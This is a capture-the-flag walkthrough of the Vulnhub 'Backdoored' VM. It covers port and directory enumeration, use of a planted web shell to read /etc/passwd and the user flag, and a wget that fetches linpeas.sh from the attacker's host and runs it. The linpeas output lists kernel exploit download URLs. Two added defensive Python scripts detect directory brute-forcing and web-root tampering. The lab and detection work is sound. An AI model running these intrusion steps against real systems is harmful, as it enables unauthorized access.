Backdoored
Identifying the target host's IP address
After importing the target machine into VirtualBox, Kali Linux could not detect the target's IP address, so the problem of the target not obtaining an IP address automatically had to be solved first; the procedure is described in the corresponding article of the 【靶机攻略】 (target machine walkthrough) series.
┌──(kali㉿kali)-[~/Vulnhub/Backdoored]
└─$ sudo netdiscover -i eth
Currently scanning: 192.168.62.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:3b:d5:03 1 60 PCS Systemtechnik GmbH
192.168.56.155 08:00:27:3c:76:0d 1 60 PCS Systemtechnik GmbH h1
Using netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.155.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/Backdoored]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.155 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-06 21:43 EST
Nmap scan report for bogon (192.168.56.155)
Host is up (0.000088s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
1337/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: backdoored VM
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:3C:76:0D (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.59 seconds
The target has only one open port, 1337, running an HTTP service.
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Backdoored]
└─$ curl http://192.168.56.155:1337
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>backdoored VM</title>
</head>
<body>
<body bgcolor="#000000">
<center>
<font color="#e60000">
<pre>
▀█████████▄ ▄████████ ▄████████ ▄█ ▄█▄ ████████▄ ▄██████▄ ▄██████▄ ▄████████ ▄████████ ████████▄
███ ███ ███ ███ ███ ███ ███ ▄███▀ ███ ▀███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▀███
███ ███ ███ ███ ███ █▀ ███▐██▀ ███ ███ ███ ███ ███ ███ ███ ███ ███ █▀ ███ ███
▄███▄▄▄██▀ ███ ███ ███ ▄█████▀ ███ ███ ███ ███ ███ ███ ▄███▄▄▄▄██▀ ▄███▄▄▄ ███ ███
▀▀███▀▀▀██▄ ▀███████████ ███ ▀▀█████▄ ███ ███ ███ ███ ███ ███ ▀▀███▀▀▀▀▀ ▀▀███▀▀▀ ███ ███
███ ██▄ ███ ███ ███ █▄ ███▐██▄ ███ ███ ███ ███ ███ ███ ▀███████████ ███ █▄ ███ ███
███ ███ ███ ███ ███ ███ ███ ▀███▄ ███ ▄███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▄███
▄█████████▀ ███ █▀ ████████▀ ███ ▀█▀ ████████▀ ▀██████▀ ▀██████▀ ███ ███ ██████████ ████████▀
▀ ███ ███
</pre>
<h4>VM Name: backdoored</h4>
<h4>Difficulty: Easy</h4>
<h4>Maker: 0xatom</h4>
<h4>Flags Under: /home/$user/user.txt & /root/root.txt</h4>
<h4>Discord: 0xatom#8707</h4>
<h4>Tip: You can't spawn a root shell, reading the root flag is enough!</h4>
<h4>For any hint feel free to contact me ಠ‿↼</h4>
<font>
</center>
</body>
</html>
The page hints that a root shell cannot be spawned; reading the root flag is enough.
┌──(kali㉿kali)-[~/Vulnhub/Backdoored]
└─$ curl http://192.168.56.155:1337/robots.txt
base64_string_that_contains_ssh_user_and_password
This hints that a base64 string contains the SSH username and password.
┌──(kali㉿kali)-[~/Vulnhub/Backdoored]
└─$ nikto -h http://192.168.56.155:1337
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.155
+ Target Hostname: 192.168.56.155
+ Target Port: 1337
+ Start Time: 2022-11-06 21:49:23 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: aa1, size: 5ac7a11a9b74a, mtime: gzip
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7917 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2022-11-06 21:50:10 (GMT-5) (47 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)? n
┌──(kali㉿kali)-[~/Vulnhub/Backdoored]
└─$ gobuster dir -u http://192.168.56.155:1337 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.155:1337
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/06 21:50:37 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 281]
Progress: 220464 / 220561 (99.96%)
===============================================================
2022/11/06 21:51:03 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Backdoored]
└─$ gobuster dir -u http://192.168.56.155:1337 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.155:1337
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: php,txt,html,sh
[+] Timeout: 10s
===============================================================
2022/11/06 21:51:50 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 281]
/.html (Status: 403) [Size: 281]
/index.html (Status: 200) [Size: 2721]
/robots.txt (Status: 200) [Size: 50]
/.php (Status: 403) [Size: 281]
/.html (Status: 403) [Size: 281]
/server-status (Status: 403) [Size: 281]
Progress: 1101539 / 1102805 (99.89%)
===============================================================
2022/11/06 21:54:12 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Backdoored]
└─$ dirb http://192.168.56.155:1337
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Nov 6 21:54:33 2022
URL_BASE: http://192.168.56.155:1337/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.155:1337/ ----
+ http://192.168.56.155:1337/index.html (CODE:200|SIZE:2721)
+ http://192.168.56.155:1337/robots.txt (CODE:200|SIZE:50)
+ http://192.168.56.155:1337/server-status (CODE:403|SIZE:281)
-----------------
END_TIME: Sun Nov 6 21:54:34 2022
DOWNLOADED: 4612 - FOUND: 3
Directory scanning found no directory or file of value. Consulting other people's writeups, the issue was the wordlist: one from SecLists is needed:
┌──(kali㉿kali)-[~/Vulnhub/Backdoored]
└─$ gobuster dir -u http://192.168.56.155:1337 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.155:1337
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/06 21:58:26 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 281]
Progress: 18650 / 56165 (33.21%)
[ERROR] 2022/11/06 21:58:28 [!] parse "http://192.168.56.155:1337/error\x1f_log": net/url: invalid control character in URL
/wedadmin (Status: 301) [Size: 326] [--> http://192.168.56.155:1337/wedadmin/]
Progress: 52950 / 56165 (94.28%)
===============================================================
2022/11/06 21:58:32 Finished
===============================================================
This again shows how much the wordlist matters; several different wordlists need to be tried.
Browsing to http://192.168.56.155:1337/wedadmin/ lands in a web shell:
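The directory brute-forcing above is loud from the server's side: the gobuster run on this page sent 220464 requests in about 26 seconds, nearly all of which Apache answered with 404. The following Python script is an added example, not part of the original writeup, showing how a defender would spot that pattern in an Apache combined-format access log: it counts 404 responses per client inside a sliding time window, flags clients that exceed a threshold, and notes scanner user agents as a secondary indicator. The log lines are constructed for the example; the client addresses, the probed paths and the gobuster/3.2.0-dev user agent are taken from the page.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed lines in Apache "combined" log format (not taken from the target's
# real access log). One client sends a gobuster-style burst of misses, a second
# client browses normally.
SAMPLE_LOG = """\
192.168.56.137 - - [06/Nov/2022:21:50:37 -0500] "GET /index.html HTTP/1.1" 200 2721 "-" "gobuster/3.2.0-dev"
192.168.56.137 - - [06/Nov/2022:21:50:37 -0500] "GET /images HTTP/1.1" 404 275 "-" "gobuster/3.2.0-dev"
192.168.56.137 - - [06/Nov/2022:21:50:37 -0500] "GET /download HTTP/1.1" 404 275 "-" "gobuster/3.2.0-dev"
192.168.56.137 - - [06/Nov/2022:21:50:38 -0500] "GET /2006 HTTP/1.1" 404 275 "-" "gobuster/3.2.0-dev"
192.168.56.137 - - [06/Nov/2022:21:50:38 -0500] "GET /news HTTP/1.1" 404 275 "-" "gobuster/3.2.0-dev"
192.168.56.137 - - [06/Nov/2022:21:50:38 -0500] "GET /crack HTTP/1.1" 404 275 "-" "gobuster/3.2.0-dev"
192.168.56.137 - - [06/Nov/2022:21:50:39 -0500] "GET /serial HTTP/1.1" 404 275 "-" "gobuster/3.2.0-dev"
192.168.56.137 - - [06/Nov/2022:21:50:39 -0500] "GET /server-status HTTP/1.1" 403 281 "-" "gobuster/3.2.0-dev"
192.168.56.137 - - [06/Nov/2022:21:50:39 -0500] "GET /wedadmin HTTP/1.1" 301 326 "-" "gobuster/3.2.0-dev"
192.168.56.1 - - [06/Nov/2022:21:50:40 -0500] "GET / HTTP/1.1" 200 2721 "-" "Mozilla/5.0"
192.168.56.1 - - [06/Nov/2022:21:52:10 -0500] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0"
"""

# Apache "combined" format: client ident user [timestamp] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# User agents of common content-discovery tools (secondary indicator only:
# a scanner can trivially change its UA, the 404 rate is the primary signal).
SCANNER_UA = re.compile(r"gobuster|dirb|dirbuster|nikto|ffuf|feroxbuster|wfuzz", re.I)


def parse_log(text):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        entries.append({
            "ip": m.group("ip"),
            "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
            "path": m.group("path"),
            "status": int(m.group("status")),
            "ua": m.group("ua"),
        })
    return entries


def detect_dir_bruteforce(text, window_seconds=60, threshold=5):
    """Flag clients that produced >= threshold 404s inside any window_seconds interval."""
    misses = defaultdict(list)
    for e in parse_log(text):
        if e["status"] == 404:
            misses[e["ip"]].append(e)

    alerts = []
    for ip, events in misses.items():
        events.sort(key=lambda e: e["ts"])
        start, peak = 0, 0
        for end in range(len(events)):
            # Slide the window start forward until the span fits into the window.
            while (events[end]["ts"] - events[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            uas = sorted({e["ua"] for e in events})
            alerts.append({
                "ip": ip,
                "peak_404s_in_window": peak,
                "distinct_paths": len({e["path"] for e in events}),
                "user_agents": uas,
                "scanner_ua": any(SCANNER_UA.search(u) for u in uas),
            })
    return alerts


if __name__ == "__main__":
    for a in detect_dir_bruteforce(SAMPLE_LOG):
        print(f"{a['ip']}: {a['peak_404s_in_window']} misses in 60s over "
              f"{a['distinct_paths']} paths, scanner UA: {a['scanner_ua']}")
```

The threshold of five misses per minute is deliberately low for an eleven-line sample; against a real site it would be tuned above the normal 404 rate of legitimate browsing (a missing favicon, as the second client shows, is not a scan). The run on this page would exceed any sane threshold within its first second, so the detector also works as a cheap alert trigger fed from the access log of the vhost on port 1337.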
bob@backdoored:/var/www/html/wedadmin# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
bob@backdoored:/var/www/html/wedadmin# uname -a
Linux backdoored 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
bob@backdoored:/var/www/html/wedadmin# cd /home
bob@backdoored:/home# ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Aug 9 2020 .
drwxr-xr-x 18 root root 4.0K Aug 9 2020 ..
drwxr-xr-x 2 bob bob 4.0K Aug 9 2020 bob
bob@backdoored:/home# cd bob
bob@backdoored:/home/bob# ls -alh
total 28K
drwxr-xr-x 2 bob bob 4.0K Aug 9 2020 .
drwxr-xr-x 3 root root 4.0K Aug 9 2020 ..
-rw------- 1 bob bob 5 Aug 9 2020 .bash_history
-rw-r--r-- 1 bob bob 220 Aug 9 2020 .bash_logout
-rw-r--r-- 1 bob bob 3.5K Aug 9 2020 .bashrc
-rw-r--r-- 1 bob bob 807 Aug 9 2020 .profile
-rw-r--r-- 1 root root 33 Aug 9 2020 user.txt
bob@backdoored:/home/bob# cat user.txt
46f7e8413056847a0d4905c5af103f56
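The /wedadmin/ web shell is the backdoor the VM is named after, and the linpeas output later in the writeup lists /var/www/html/wedadmin/index.php and /var/www/html/index.html.save as the only non-default files under the web root. The following Python script is an added example, not part of the original writeup: it baselines a web root as a sha256 manifest and reports added, removed and modified files, flagging added server-executable files and editor leftovers. The directory, file names and file bodies in demo() are constructed placeholders that mirror the page's file names; they contain no web-shell code.

```python
import hashlib
import os
import tempfile


def build_manifest(root):
    """Return {relative_path: sha256_hex} for every regular file under root."""
    manifest = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            digest = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            manifest[rel] = digest.hexdigest()
    return manifest


def diff_manifests(baseline, current):
    """Classify every path as added, removed or modified relative to the baseline."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def suspicious_additions(diff):
    """Added files that the server would execute, or that look like editor/backup leftovers."""
    executable = (".php", ".phtml", ".phar")
    leftovers = (".save", ".bak", ".old", "~")
    return [p for p in diff["added"] if p.lower().endswith(executable + leftovers)]


def _write(root, rel, data):
    """Helper for the demo: create rel under root (creating parent directories)."""
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w", encoding="utf-8") as fh:
        fh.write(data)


def demo():
    """Constructed scenario: baseline a static web root, then plant a PHP file in a
    new subdirectory, leave an editor backup behind and edit an existing file."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "index.html", "<html>backdoored VM</html>\n")
        _write(root, "robots.txt", "constructed placeholder\n")
        baseline = build_manifest(root)

        # Simulated tampering. Bodies are placeholders, not real web-shell code.
        _write(root, "wedadmin/index.php", "<?php /* placeholder */ ?>\n")
        _write(root, "index.html.save", "<html>backdoored VM</html>\n")
        _write(root, "robots.txt", "constructed placeholder, edited\n")

        diff = diff_manifests(baseline, build_manifest(root))
        diff["flagged"] = suspicious_additions(diff)
        return diff


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:>9}: {paths}")
```

In practice the baseline manifest is written at deployment time and stored off the host (an attacker with write access to the web root can otherwise regenerate it); a periodic run of build_manifest plus diff_manifests then surfaces a planted wedadmin/index.php in the next cycle, regardless of how it was named or what it contains.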
Privilege escalation
Upload the linpeas.sh script to the target's /tmp directory, make it executable and run it:
bob@backdoored:/tmp# wget http://192.168.56.137:8000/linpeas.sh
--2022-11-07 06:04:58-- http://192.168.56.137:8000/linpeas.sh
Connecting to 192.168.56.137:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 827827 (808K) [text/x-sh]
Saving to: 'linpeas.sh'
0K .......... .......... .......... .......... .......... 6% 79.6M 0s
50K .......... .......... .......... .......... .......... 12% 57.8M 0s
100K .......... .......... .......... .......... .......... 18% 79.9M 0s
150K .......... .......... .......... .......... .......... 24% 64.6M 0s
200K .......... .......... .......... .......... .......... 30% 82.0M 0s
250K .......... .......... .......... .......... .......... 37% 124M 0s
300K .......... .......... .......... .......... .......... 43% 141M 0s
350K .......... .......... .......... .......... .......... 49% 137M 0s
400K .......... .......... .......... .......... .......... 55% 171M 0s
450K .......... .......... .......... .......... .......... 61% 199M 0s
500K .......... .......... .......... .......... .......... 68% 273M 0s
550K .......... .......... .......... .......... .......... 74% 324M 0s
600K .......... .......... .......... .......... .......... 80% 327M 0s
650K .......... .......... .......... .......... .......... 86% 277M 0s
700K .......... .......... .......... .......... .......... 92% 281M 0s
750K .......... .......... .......... .......... .......... 98% 386M 0s
800K ........ 100% 185M=0.006s
2022-11-07 06:04:58 (131 MB/s) - 'linpeas.sh' saved [827827/827827]
bob@backdoored:/tmp# ls -alh
total 820K
drwxrwxrwt 2 root root 4.0K Nov 7 06:04 .
drwxr-xr-x 18 root root 4.0K Aug 9 2020 ..
-rw-r--r-- 1 bob bob 809K Nov 6 22:04 linpeas.sh
bob@backdoored:/tmp# chmod +x linpeas.sh
bob@backdoored:/tmp# ./linpeas.sh
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
JOURNAL_STREAM=9:12497
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
INVOCATION_ID=d09b6d66f3614074a40fdbaece114de6
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
HISTSIZE=0
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/tmp
HISTFILE=/dev/null
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
Exposure: highly probable
Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},[ debian=10{kernel:4.19.0-*} ],fedora=30{kernel:5.0.9-*}
Download URL: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47133.zip
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
Comments: Requires an active PolKit agent.
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
/usr/bin/base64
/usr/bin/nc
/usr/bin/nc.traditional
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/python3.7
/usr/bin/wget
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
-rw-r--r-- 1 root root 1332 Apr 2 2019 /etc/apache2/sites-available/000-default.conf
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
lrwxrwxrwx 1 root root 35 Aug 9 2020 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
-rw-r--r-- 1 root root 71958 Jul 5 2020 /etc/php/7.3/apache2/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
ibase.allow_persistent = 1
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 71570 Jul 5 2020 /etc/php/7.3/cli/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
ibase.allow_persistent = 1
mysqli.allow_persistent = On
pgsql.allow_persistent = On
╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 Aug 9 2020 /etc/ldap
╔══════════╣ Searching ssl/ssh files
PermitRootLogin yes
ChallengeResponseAuthentication no
UsePAM yes
══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow
Searching inside /etc/ssh/ssh_config for interesting info
Host *
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes
╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Aug 9 2020 /etc/pam.d
-rw-r--r-- 1 root root 2133 Jan 31 2020 /etc/pam.d/sshd
╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 4096 Aug 9 2020 /usr/share/keyrings
╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd
╔══════════╣ Analyzing PGP-GPG Files (limit 70)
gpg Not Found
netpgpkeys Not Found
netpgp Not Found
-rw-r--r-- 1 root root 8132 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-buster-automatic.gpg
-rw-r--r-- 1 root root 8141 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-buster-security-automatic.gpg
-rw-r--r-- 1 root root 2332 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-buster-stable.gpg
-rw-r--r-- 1 root root 5106 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-jessie-automatic.gpg
-rw-r--r-- 1 root root 5115 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic.gpg
-rw-r--r-- 1 root root 2763 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-jessie-stable.gpg
-rw-r--r-- 1 root root 7443 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-stretch-automatic.gpg
-rw-r--r-- 1 root root 7452 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-stretch-security-automatic.gpg
-rw-r--r-- 1 root root 2263 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-stretch-stable.gpg
-rw-r--r-- 1 root root 8132 Apr 23 2019 /usr/share/keyrings/debian-archive-buster-automatic.gpg
-rw-r--r-- 1 root root 8141 Apr 23 2019 /usr/share/keyrings/debian-archive-buster-security-automatic.gpg
-rw-r--r-- 1 root root 2332 Apr 23 2019 /usr/share/keyrings/debian-archive-buster-stable.gpg
-rw-r--r-- 1 root root 5106 Apr 23 2019 /usr/share/keyrings/debian-archive-jessie-automatic.gpg
-rw-r--r-- 1 root root 5115 Apr 23 2019 /usr/share/keyrings/debian-archive-jessie-security-automatic.gpg
-rw-r--r-- 1 root root 2763 Apr 23 2019 /usr/share/keyrings/debian-archive-jessie-stable.gpg
-rw-r--r-- 1 root root 48747 Apr 23 2019 /usr/share/keyrings/debian-archive-keyring.gpg
-rw-r--r-- 1 root root 23889 Apr 23 2019 /usr/share/keyrings/debian-archive-removed-keys.gpg
-rw-r--r-- 1 root root 7443 Apr 23 2019 /usr/share/keyrings/debian-archive-stretch-automatic.gpg
-rw-r--r-- 1 root root 7452 Apr 23 2019 /usr/share/keyrings/debian-archive-stretch-security-automatic.gpg
-rw-r--r-- 1 root root 2263 Apr 23 2019 /usr/share/keyrings/debian-archive-stretch-stable.gpg
-rwsr-xr-x 1 root root 51K Jan 10 2019 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 53K Jul 27 2018 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 35K Jan 10 2019 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 83K Jul 27 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 63K Jan 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 63K Jul 27 2018 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 427K Jan 31 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 50K Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root shadow 39K Feb 14 2019 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root tty 35K Jan 10 2019 /usr/bin/wall
-rwxr-sr-x 1 root tty 15K May 4 2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root crontab 43K Oct 11 2019 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 71K Jul 27 2018 /usr/bin/chage
-rwxr-sr-x 1 root ssh 315K Jan 31 2020 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 31K Jul 27 2018 /usr/bin/expiry
-rwxr-sr-x 1 root mail 19K Dec 3 2017 /usr/bin/dotlockfile
Files with capabilities (limited to 50):
/usr/bin/ping = cap_net_raw+ep
/usr/bin/tac = cap_dac_read_search+ep
/home/bob/user.txt
/root/
/var/www
/var/www/html
/var/www/html/robots.txt
/var/www/html/wedadmin
/var/www/html/wedadmin/index.php
/var/www/html/index.html.save
/var/www/html/index.html
Default mail command: /usr/bin/mail
Default compress command: /bin/gzip
Default uncompress command: /bin/gunzip
Default compress extension: .gz
Default state file path: /var/lib/logrotate/status
ACL support: yes
SELinux support: yes
╔══════════╣ Files inside /home/bob (limit 20)
total 28
drwxr-xr-x 2 bob bob 4096 Aug 9 2020 .
drwxr-xr-x 3 root root 4096 Aug 9 2020 ..
-rw------- 1 bob bob 5 Aug 9 2020 .bash_history
-rw-r--r-- 1 bob bob 220 Aug 9 2020 .bash_logout
-rw-r--r-- 1 bob bob 3526 Aug 9 2020 .bashrc
-rw-r--r-- 1 bob bob 807 Aug 9 2020 .profile
